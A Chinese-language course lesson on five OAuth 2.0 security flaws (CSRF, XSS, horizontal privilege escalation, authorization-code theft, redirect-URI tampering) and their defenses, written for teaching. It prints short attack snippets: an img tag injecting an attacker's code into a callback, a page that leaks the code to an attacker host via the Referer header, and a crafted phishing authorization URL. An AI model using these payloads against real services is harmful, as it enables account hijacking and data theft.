You cannot select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

17 KiB

08 | 实践OAuth 2.0时,使用不当可能会导致哪些安全漏洞?

你好,我是王新栋。

当知道这一讲的主题是OAuth 2.0的安全漏洞时你可能要问了“OAuth 2.0 不是一种安全协议吗不是保护Web API的吗为啥OAuth 2.0自己还有安全的问题了呢?”

首先OAuth 2.0 的确是一种安全协议。这没啥问题但是它有很多使用规范比如授权码是一个临时凭据只能被使用一次要对重定向URI做校验等。那么如果使用的时候你没有按照这样的规范来实施就会有安全漏洞了。

其次OAuth 2.0既然是“生长”在互联网这个大环境中就一样会面对互联网上常见安全风险的攻击比如跨站请求伪造Cross-site request forgeryCSRF、跨站脚本攻击Cross Site ScriptingXSS

最后除了这些常见攻击类型外OAuth 2.0 自身也有可被利用的安全漏洞比如授权码失窃、重定向URI伪造。

所以,我们在实践OAuth 2.0的过程中,安全问题一定是重中之重。接下来我挑选了5个典型的安全问题其中CSRF、XSS、水平越权这三种是互联网环境下常见的安全风险授权码失窃和重定向URI被篡改属于OAuth2.0“专属”的安全风险。接下来,我就和你一起看看这些安全风险的由来,以及如何应对吧。

CSRF攻击

对于CSRF的定义《OAuth 2 in Action》这本书里的解释是我目前看到的最为贴切的解释恶意软件让浏览器向已完成用户身份认证的网站发起请求,并执行有害的操作,就是跨站请求伪造攻击。

它是互联网上最为常见的攻击之一。我们在实践OAuth2.0的过程其实就是在构建一次互联网的应用。因此OAuth 2.0同样也会面临这个攻击。接下来,我通过一个案例和你说明这个攻击类型。

有一个软件 A我们让它来扮演攻击者让它的开发者按照正常的流程使用极客时间。当该攻击者授权后拿到授权码的值 codeA之后“立即按下了暂停键”不继续往下走了。那它想干啥呢我们继续往下看。

这时,有一个第三方软件B比如咱们的Web版极客时间来扮演受害者吧。当然最终的受害者是用户这里是用Web版极客时间来作为被软件A攻击的对象

极客时间用于接收授权码的回调地址为 https://time.geekbang.org/callback。有一个用户G已经在极客时间的平台登录且对极客时间进行了授权也就是用户G已经在极客时间平台上有登录态了。

如果此时攻击者软件A在自己的网站上构造了一个恶意页面

<html>
<img src ="https://time.geekbang.org/callbackcode=codeA">
</html>

如果这个时候用户G被攻击者软件A诱导而点击了这个恶意页面那结果就是极客时间使用codeA值去继续OAuth 2.0的流程了。这其实就走完了一个CSRF攻击的过程如下图所示

如果我们将OAuth 2.0用于了身份认证那么就会造成严重的后果因为用户G使用的极客时间的授权上下文环境跟攻击者软件A的授权上下文环境绑定在了一起。为了解释两个上下文环境绑定在一起可能带来的危害,我们还是拿极客时间来举例。

假如极客时间提供了用户账号和微信账号做绑定的功能也就是说用户先用自己的极客时间的账号登录然后可以绑定微信账号以便后续可以使用微信账号来登录。在绑定微信账号的时候微信会咨询你是否给极客时间授权让它获取你在微信上的个人信息。这时候就需要用到OAuth 2.0的授权流程。

如果攻击者软件A通过自己的极客时间账号事先做了上面的绑定操作也就是说攻击者已经可以使用自己的微信账号来登录极客时间了。那有一天软件A想要“搞事情”了便在发起了一个授权请求后构造了一个攻击页面里面包含的模拟代码正如我在上面描述的那样来诱导用户G点击。

而用户G已经用极客时间的账号登录了极客时间此时正要去做跟微信账号的绑定。如果这个时候他刚好点击了攻击者A“种下”的这个恶意页面那么后面换取授权的访问令牌access_token以及通过accces_token获取的信息就都是攻击者软件A的了。

这就相当于用户G将自己的极客时间的账号跟攻击者软件A的微信账号绑定在了一起。这样一来后续攻击者软件A就能够通过自己的微信账号来登录用户G的极客时间了。这个后果可想而知。

那如何避免这种攻击呢方法也很简单实际上OAuth 2.0中也有这样的建议,就是使用state参数,它是一个随机值的参数。

还是以上面的场景为例当极客时间请求授权码的时候附带一个自己生成state参数值同时授权服务也要按照规则将这个随机的state值跟授权码code一起返回给极客时间。这样当极客时间接收到授权码的时候就要在极客时间这一侧做一个state参数值的比对校验如果相同就继续流程否则直接拒绝后续流程。

在这样的情况下软件A要想再发起CSRF攻击就必须另外构造一个state值而这个state没那么容易被伪造。这本就是一个随机的数值而且在生成时就遵从了被“猜中”的概率要极小的建议。比如生成一个6位字母和数字的组合值显然要比生成一个6位纯数字值被“猜中”的概率要小。所以软件B通过使用state参数就实现了一个基本的防跨站请求伪造保护。

我们再来总结下这个攻击过程本质上就是软件A攻击者用自己的授权码codeA的值通过CSRF攻击“替换”了软件B的授权码的值。

接下来我再给你看一种互联网常见的安全攻击类型也就是XSS攻击。

XSS攻击

XSS攻击的主要手段是将恶意脚本注入到请求的输入中攻击者可以通过注入的恶意脚本来进行攻击行为比如搜集数据等。截止到2020年6月23日在OWASP一个开源的Web应用安全项目上查看安全漏洞排名的话它依然在TOP10榜单上面,可谓“大名鼎鼎”。

网络上有很多关于XSS的介绍了我推荐你看看《XSS攻击原理分析与防御技术》这篇文章它很清晰地分析了XSS的原理以及防御方法。今天我们主要看看它是怎么在OAuth 2.0的流程中“发挥”的。

当请求抵达受保护资源服务时系统需要做校验比如第三方软件身份合法性校验、访问令牌access_token的校验如果这些信息都不能被校验通过受保护资源服务就会返回错误的信息。

大多数情况下受保护资源都是把输入的内容比如app_id invalid、access_token invalid 再回显一遍这时就会被XSS攻击者捕获到机会。试想下如果攻击者传入了一些恶意的、搜集用户数据的JavaScript 代码,受保护资源服务直接原路返回到用户的页面上,那么当用户触发到这些代码的时候就会遭受到攻击。

因此受保护资源服务就需要对这类XSS漏洞做修复而具体的修复方法跟其它网站防御XSS类似最简单的方法就是对此类非法信息做转义过滤,比如对包含<script><img><a>等标签的信息进行转义过滤。

CSRF攻击、XSS攻击是我从OWASP网站上挑选的两个最为熟知的两种攻击类型它们应该是所有Web系统都需要共同防范的。我们在实施OAuth 2.0 架构的时候,也一定要考虑到这层防护,否则就会给用户造成伤害。接下来,我再带着你了解一下水平越权攻击。

水平越权

水平越权是指,在请求受保护资源服务数据的时候,服务端应用程序未校验这条数据是否归属于当前授权的请求用户。这样不法者用自己获得的授权来访问受保护资源服务的时候,就有可能获取其他用户的数据,导致水平越权漏洞问题的发生。攻击者可越权的操作有增加、删除、修改和查询,无论更新操作还是查询操作都有相当的危害性。

这么说可能有些抽象,我们看一个具体的例子。

还是以我们的“小兔打单软件”为例第三方开发者开发了这款打单软件目前有两个商家A和商家B购买并使用。现在小兔打单软件上面提供了根据订单ID查询订单数据的功能如下图所示。

商家A和商家B分别给小兔打单软件应用做了授权也就是说小兔打单软件可以获取商家A和商家B的订单数据。此时没有任何问题**那么商家A可以获取商家B的订单数据吗**答案是,极有可能的。

在开放平台环境下授权关系的校验是由一般由开放网关这一层来处理因为受保护资源服务会散落在各个业务支持部门。请求数据通过开放网关之后由访问令牌access_token获取了用户的身份比如商家ID就会透传到受保护资源服务也就是上游接口提供方的系统。

此时如果受保护资源服务没有对商家ID和订单ID做归属判断就有可能发生商家A获取商家B订单数据的问题造成水平越权问题。

发生水平越权问题的根本原因还是开发人员的认知与意识不够。如果认知与意识跟得上那在设计之初增加归属关系判断比如上面提到的订单ID和商家ID的归属关系判断就能在很大程度上避免这个漏洞。

同时,在开放平台环境下,由于开放网关和数据接口提供方来自不同的业务部门,防止水平校验的逻辑处理很容易被遗漏:

  • 一方面开放网关的作用是将用户授权之后的访问令牌access_token信息转换成真实的用户信息比如上面提到的商家ID然后传递到接口提供方数据归属判断逻辑只能在接口提供方内部处理
  • 另一方面,数据提供方往往会认为开放出的接口是被“跟自己一个公司的系统所调用的”,容易忽略水平校验的逻辑处理。

所以,在开放平台环境下,我们就要更加重视与防范数据的越权问题。

以上CSRF攻击、XSS攻击、水平越权这三种攻击类型它们都属于OAuth 2.0面临的互联网非常常见的通用攻击类型。而对于其他的互联网攻击类型,如果你想深入了解的话,可以看一下这篇安全案例回顾的文章。

接下来我们再看两种OAuth 2.0专有的安全攻击分别是授权码失窃、重定向URI被篡改。

授权码失窃

我们举个例子,先来学习授权码失窃这个场景。

如果第三方软件A有合法的app_id和app_secret那么当它去请求访问令牌的时候也是合法的。这个时候没有任何问题让我们继续。

如果有一个用户G对第三方软件B比如极客时间进行授权并产生了一个授权码codeB但并没有对攻击者软件A授权。此时软件A是不能访问用户G的所有数据的。但这时如果软件A获取了这个codeB是不是就能够在没有获得用户G授权的情况下访问用户G的数据了整个过程如下图所示。

这时问题的根源就在于两点:

  • 授权服务在进行授权码校验的时候没有校验app_id_B
  • 软件B也就是极客时间使用过一次codeB的值之后授权服务没有删除这个codeB

看到这里通过校验app_id_B并删除掉使用过一次的授权码及其对应的访问令牌就可以从根本上来杜绝授权码失窃带来的危害了。

说到这里你不禁要问了授权码到底是怎么失窃的呢接下来我要介绍的就是授权码失窃的可能的方法之一这也是OAuth 2.0中因重定向URI校验方法不当而遭受到的一种危害。这种安全攻击类型就是重定向URI被篡改。

重定向URI被篡改

有的时候授权服务提供方并没有对第三方软件的回调URI做完整性要求和完整性校验。比如第三软件B极客时间的详细回调URI是https://time.geekbang.org/callback,那么在完整性校验缺失的情况下,只要以https://time.geekbang.org开始的回调URI地址都会被认为是合法的。

此时,如果黑客在https://time.geekbang.org/page/下,创建了一个页面hacker.html。这个页面的内容可以很简单,其目的就是让请求能够抵达攻击者的服务。

<html>
<img src ="https://clientA.com/catch">
</html>

好了,我们继续看下接下来的攻击流程:

首先黑客将构造的攻击页面放到对应的hacker.html上也就是https://time.geekbang.org/page/hacker.html同时构造出了一个新的重定向URIhttps://time.geekbang.org/page/welcome/back.html../hacker.html

然后,黑客利用一些钓鱼手段诱导用户,去点击下面的这个地址:

https://oauth-server.com/auth?respons_type=code&client_id=CLIENTID&redirect_uri=https://time.geekbang.org/page/welcome/back.html../hacker.html

这样当授权服务做出响应进行重定向请求的时候授权码code就返回到了hacker.html这个页面上。

最后,黑客在https://clientA.com/catch页面上解析Referrer头部就会得到用户的授权码继而就可以像授权码失窃的场景中那样去换取访问令牌了。

看到这里我们就知道了如果授权服务要求的回调URI是https://time.geekbang.org/callback并做了回调URI的完整性校验那么被篡改之后的回调地址https://time.geekbang.org/page/welcome/back.html../hacker.html就不会被授权服务去发起重定向请求。

严格来讲要发生这样的漏洞问题条件还是比较苛刻的。从图6的重定向URI被篡改的流程中也可以看到只要我们在授权服务验证第三方软件的请求时做了签名校验那么攻击者在只拿到授权码code的情况下仍然无法获取访问令牌因为第三方软件只有通过访问令牌才能够访问用户的数据。

但是,如果这些防范安全风险的规范建议你通通都没有遵守,那就是在给攻击者“大显身手”的机会,让你的应用软件以及用户遭受损失。

总结

好了以上就是今天的主要内容了。我们一起学习了OAuth 2.0相关的常见又比较隐蔽的5种安全问题包括CSRF攻击、XSS攻击、水平越权、授权码失窃、重定向URI被篡改。更多关于OAuth 2.0 安全方面的内容你也可以去翻阅《OAuth 2 in Action》这本书。

通过这一讲的学习,你需要记住以下三个知识点:

  1. 互联网场景的安全攻击类型比如CSRF、XSS等在OAuth 2.0中一样要做防范因为OAuth 2.0本身就是应用在互联网场景中。
  2. 除了常见的互联网安全攻击OAuth 2.0也有自身的安全风险问题比如我们讲到的授权码失窃、重定向URI被篡改。
  3. 这些安全问题,本身从攻击的“技术含量”上并不高,但导致这些安全风险的因素,往往就是开发人员的安全意识不够。比如,没有意识到水平越权中的数据归属逻辑判断,需要加入到代码逻辑中。

其实OAuth 2.0 的规范里面对这些安全问题都有对应的规避方式但都要求我们使用的时候一定要非常严谨。比如重定向URI的校验方式规范里面是允许模糊校验的但在结合实际环境的时候我们又必须做到精确匹配校验才可以保障OAuth 2.0流转的安全性。

最后我还整理了一张知识脑图总结了这5种攻击方式的内容来帮助你理解与记忆。

思考题

  1. 今天我们讲的这些安全问题,都是站在“守”的一方,并没有告诉你如何 “绞尽脑汁” 地利用漏洞。所谓“知己知彼百战不殆”现在你站在“攻”的一方来考虑下除了重定向URI被篡改还有什么其它的授权码被盗的场景吗

  2. 你认为还有哪些安全风险是专属于OAuth 2.0的吗?

欢迎你在留言区分享你的观点,也欢迎你把今天的内容分享给其他朋友,我们一起交流。